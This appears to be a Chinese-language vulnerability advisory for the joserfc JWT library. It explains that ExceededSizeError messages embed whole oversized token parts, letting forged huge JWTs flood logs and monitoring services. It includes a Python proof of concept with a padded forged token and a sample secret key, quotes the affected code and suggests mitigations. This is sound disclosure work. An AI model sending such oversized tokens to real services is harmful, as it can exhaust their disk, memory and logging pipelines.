joserfc 存在可能的不可控资源消耗漏洞,由记录任意大的JWT令牌负载触发
漏洞详情
摘要
ExceededSizeError异常消息中嵌入了未解码的JWT令牌部分,可能导致Python日志记录任意大的、伪造的JWT负载。
详细信息
当前端未配置或完全缺失生产级Web服务器时,攻击者可能能够在HTTP请求头中发送任意大的承载令牌。当这种情况发生时,在joserfc.jwt.decode()操作期间,Python日志记录或诊断工具(如Sentry)最终可能会处理包含完整JWT头的极大日志消息。同样的行为也出现在验证声明和签名负载大小时,因为该库会引发嵌入完整负载的joserfc.errors.ExceededSizeError()异常消息。由于此时负载已完全加载到内存中,库本身无法防止或拒绝它。
因此,强制执行请求头大小限制的责任在于底层的Web服务器(uvicorn/h11、gunicorn、Starlette、Werkzeug、nginx等)。例如,没有运行在uvicorn和/或gunicorn之后的FastAPI/Starlette应用无法自行强制执行请求头大小限制。使用uvicorn/h11时,--h11-max-incomplete-event-size选项可以限制请求头和请求体的总大小,但不能单独限制请求头。同样,vLLM服务由于依赖uvicorn/h11以及机器学习推理工作负载中需要大量数据传输,默认将请求头和请求体的总大小限制设为4 MB,并且经常被提高。在实践中,通常需要一个健壮的反向代理(如nginx),因为它可以明确限制最大请求头大小。不幸的是,许多Web应用并未运行在适当的反向代理之后。
鉴于这些约束,joserfc库无法安全地记录或嵌入任意大小的负载。此问题尤其隐蔽,因为它仅在恶意构造的JWT最终到达Python应用时发生,大多数开发人员在常规开发和测试中永远不会遇到这种情况。
概念验证(PoC)
环境
- Ubuntu 24.04 LTS
- Python 3.12
- 在 joserfc 版本 1.4.1 上测试
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
|
import logging
from datetime import UTC, datetime, timedelta
from joserfc import jwt
from joserfc.errors import ExceededSizeError, UnsupportedAlgorithmError
from joserfc.jwk import OctKey
logger = logging.getLogger(__name__)
SECRET_KEY = "8c13bd66babc241b29f8553429bdab7deb6f5b74ddfda7765471e57ecd55641e"
LONG_JWT_TOKEN = (
"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGQifQ"
"."
"eyJpc3MiOiJhdXRoX3NlcnZlciIsImlhdCI6MTc2MzI0OTEwMSwiZXhwIjoxNzY5MjQ5MTAxfQ"
"."
"6-k2jmkGXD6wXOgYgjPS8E5lS_GjWpgIuY54gokjAn8"
)
HEADER = {
"alg": (
"RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
"RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
"RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
"RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
"RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
"RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
),
}
CLAIMS = {
"iss": "auth_server",
"iat": datetime.now(UTC),
"exp": datetime.now(UTC) + timedelta(minutes=15),
}
def main():
# 从 SECRET_KEY 创建 OctKey
key = OctKey.import_key(SECRET_KEY)
# 模拟创建非常大的 JWT
# (这将因无效的 'alg' 请求头内容而失败,并引发 joserfc.errors.UnsupportedAlgorithmError)
try:
token = jwt.encode(HEADER, CLAIMS, key)
except UnsupportedAlgorithmError:
# 使用具有相同请求头和声明但签名无效的伪造令牌
token = LONG_JWT_TOKEN
logger.warning(f"Created JWT: {token}")
# 现在尝试解码大的 JWT
try:
decoded_token = jwt.decode(token, key)
logger.warning("This line will never be reached.")
logger.warning(decoded_token.claims)
except ExceededSizeError:
logger.exception(
"The JWT size is too large and may be a security attack attempt."
)
# 这里正在异常消息中记录整个请求头内容!
|
代码位置
此行为出现在:
joserfc/_rfc7515/registry.py
L102-112
1
2
3
4
5
6
7
8
9
10
11
|
def validate_header_size(self, header: bytes) -> None:
if header and len(header) > self.max_header_length:
raise ExceededSizeError(f"Header size of '{header!r}' exceeds {self.max_header_length} bytes.")
def validate_payload_size(self, payload: bytes) -> None:
if payload and len(payload) > self.max_payload_length:
raise ExceededSizeError(f"Payload size of '{payload!r}' exceeds {self.max_payload_length} bytes.")
def validate_signature_size(self, signature: bytes) -> None:
if len(signature) > self.max_signature_length:
raise ExceededSizeError(f"Signature of '{signature!r}' exceeds {self.max_signature_length} bytes.")
|
joserfc/_rfc7516/registry.py
L103-123
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
def validate_protected_header_size(self, header: bytes) -> None:
if header and len(header) > self.max_protected_header_length:
raise ExceededSizeError(f"Header size of '{header!r}' exceeds {self.max_protected_header_length} bytes.")
def validate_encrypted_key_size(self, ek: bytes) -> None:
if ek and len(ek) > self.max_encrypted_key_length:
raise ExceededSizeError(f"Encrypted key size of '{ek!r}' exceeds {self.max_encrypted_key_length} bytes.")
def validate_initialization_vector_size(self, iv: bytes) -> None:
if iv and len(iv) > self.max_initialization_vector_length:
raise ExceededSizeError(
f"Initialization vector size of '{iv!r}' exceeds {self.max_initialization_vector_length} bytes."
)
def validate_ciphertext_size(self, ciphertext: bytes) -> None:
if ciphertext and len(ciphertext) > self.max_ciphertext_length:
raise ExceededSizeError(f"Ciphertext size of '{ciphertext!r}' exceeds {self.max_ciphertext_length} bytes.")
def validate_auth_tag_size(self, tag: bytes) -> None:
if tag and len(tag) > self.max_auth_tag_length:
raise ExceededSizeError(f"Auth tag size of '{tag!r}' exceeds {self.max_auth_tag_length} bytes.")
|
joserfc/_rfc7518/jwe_zips.py中出现的另一个ExceededSizeError不受此问题影响,因为它没有在异常消息中包含负载内容。
影响
在Web应用未拒绝过大的HTTP请求头负载的场景中,使用joserfc可能会使系统面临"无限制或节流的资源分配(CWE-770)“的风险,可能影响应用主机上的磁盘、内存和CPU,以及任何外部日志存储、摄取管道或警报服务。可以通过从某些joserfc.errors.ExceededSizeError()异常消息中移除JWT负载来降低此风险。同时,在文档中建议将库部署在能够正确强制执行最大请求头大小的健壮Web服务器或反向代理之后也是有益的。
参考资料